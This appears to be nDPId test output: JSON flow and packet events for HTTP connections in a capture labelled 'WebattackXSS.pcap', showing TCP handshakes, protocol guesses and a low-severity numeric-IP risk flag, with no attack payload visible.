-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347923737,"flow_last_seen":1499347928880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347926328,"flow_last_seen":1499347931880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347926328,"flow_last_seen":1499347931880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347927657,"flow_last_seen":1499347932881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347927657,"flow_last_seen":1499347932881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347930265,"flow_last_seen":1499347935880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347930265,"flow_last_seen":1499347935880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347931529,"flow_last_seen":1499347936881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34198,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347931529,"flow_last_seen":1499347936881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347934152,"flow_last_seen":1499347939882,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34224,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347934152,"flow_last_seen":1499347939882,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8975,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348051362,"flow_last_seen":1499348051362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348051362,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8975,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":1,"flow_last_seen":1499348051362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348051362,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ntRAAD4GJvysEAABwKgKMop6AFCG4ZTiAAAAAKACchCtAgAAAgQFtAQCCAoBPQo2AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":2,"flow_last_seen":1499348051362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348051362,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQinqx2HVxhuGU46AScSCnBwAAAgQFtAQCCAoD5tupAT0KNgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8977,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":3,"flow_last_seen":1499348051362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348051362,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ntVAAD4GJwOsEAABwKgKMop6AFCG4ZTjsdh1coAQAOVGDwAAAQEICgE9CjYD5tup"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8987,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348052641,"flow_last_seen":1499348052641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348052641,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8987,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":1,"flow_last_seen":1499348052641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348052641,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8j\/xAAD4GNdSsEAABwKgKMoqIAFBipISJAAAAAKACchDgSwAAAgQFtAQCCAoBPQt1AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8988,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":2,"flow_last_seen":1499348052641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348052641,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiogIs7XwYqSEiqAScSBBtwAAAgQFtAQCCAoD5tzpAT0LdQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":3,"flow_last_seen":1499348052642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348052642,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0j\/1AAD4GNdusEAABwKgKMoqIAFBipISKCLO18YAQAOXgvQAAAQEICgE9C3YD5tzp"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9005,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348055228,"flow_last_seen":1499348055228,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348055228,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9005,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":1,"flow_last_seen":1499348055228,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348055228,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W0hAAD4GaoisEAABwKgKMoqiAFBaIFa0AAAAAKACchAUBAAAAgQFtAQCCAoBPQ38AAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9006,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":2,"flow_last_seen":1499348055228,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348055228,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiqK\/mxmbWiBWtaAScSBYVQAAAgQFtAQCCAoD5t9wAT0N\/AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9007,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":3,"flow_last_seen":1499348055229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348055229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W0lAAD4Gao+sEAABwKgKMoqiAFBaIFa1v5sZnIAQAOX3XAAAAQEICgE9DfwD5t9w"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9017,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348056534,"flow_last_seen":1499348056534,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348056534,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9017,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":1,"flow_last_seen":1499348056534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348056534,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LdZAAD4Gl\/qsEAABwKgKMoqwAFDDZCKVAAAAAKACchDdiQAAAgQFtAQCCAoBPQ9DAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9018,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":2,"flow_last_seen":1499348056535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348056535,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQirDnT6dMw2QilqAScSBrLgAAAgQFtAQCCAoD5uC3AT0PQwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9019,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":3,"flow_last_seen":1499348056535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348056535,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LddAAD4GmAGsEAABwKgKMoqwAFDDZCKW50+nTYAQAOUKNgAAAQEICgE9D0MD5uC3"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9029,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348057789,"flow_last_seen":1499348057789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348057789,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9029,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":1,"flow_last_seen":1499348057789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348057789,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8cW1AAD4GVGOsEAABwKgKMoq+AFBo3mEQAAAAAKACchD4TAAAAgQFtAQCCAoBPRB9AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9030,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":2,"flow_last_seen":1499348057790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348057790,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQir7ZkVGbaN5hEaAScSDoJwAAAgQFtAQCCAoD5uHwAT0QfQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":3,"flow_last_seen":1499348057790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348057790,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0cW5AAD4GVGqsEAABwKgKMoq+AFBo3mER2ZFRnIAQAOWHLwAAAQEICgE9EH0D5uHw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9041,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348059068,"flow_last_seen":1499348059068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348059068,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9041,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":1,"flow_last_seen":1499348059068,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348059068,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SJlAAD4GfTesEAABwKgKMorMAFAzNVklAAAAAKACchA0lAAAAgQFtAQCCAoBPRG8AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9042,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":2,"flow_last_seen":1499348059069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348059069,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQisz9Lu2rMzVZJqAScSBjgQAAAgQFtAQCCAoD5uMwAT0RvAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":3,"flow_last_seen":1499348059069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348059069,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SJpAAD4GfT6sEAABwKgKMorMAFAzNVkm\/S7trIAQAOUCiAAAAQEICgE9Eb0D5uMw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9050,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348060393,"flow_last_seen":1499348060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060393,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9050,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":1,"flow_last_seen":1499348060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348060393,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80ItAAD4G9USsEAABwKgKMoraAFD\/pcOMAAAAAKACchD8YgAAAgQFtAQCCAoBPRMHAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9051,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":2,"flow_last_seen":1499348060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348060393,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQitr3giqS\/6XDjaAScSDyygAAAgQFtAQCCAoD5uR7AT0TBwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":3,"flow_last_seen":1499348060394,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348060394,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00IxAAD4G9UusEAABwKgKMoraAFD\/pcON94Iqk4AQAOWR0QAAAQEICgE9EwgD5uR7"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"finished","flow_packets_processed":316,"flow_first_seen":1499347872187,"flow_last_seen":1499347941610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":735,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347935445,"flow_last_seen":1499347940883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34238,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347935445,"flow_last_seen":1499347940883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347936727,"flow_last_seen":1499347941876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347936727,"flow_last_seen":1499347941876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347940593,"flow_last_seen":1499347945883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34292,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347940593,"flow_last_seen":1499347945883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 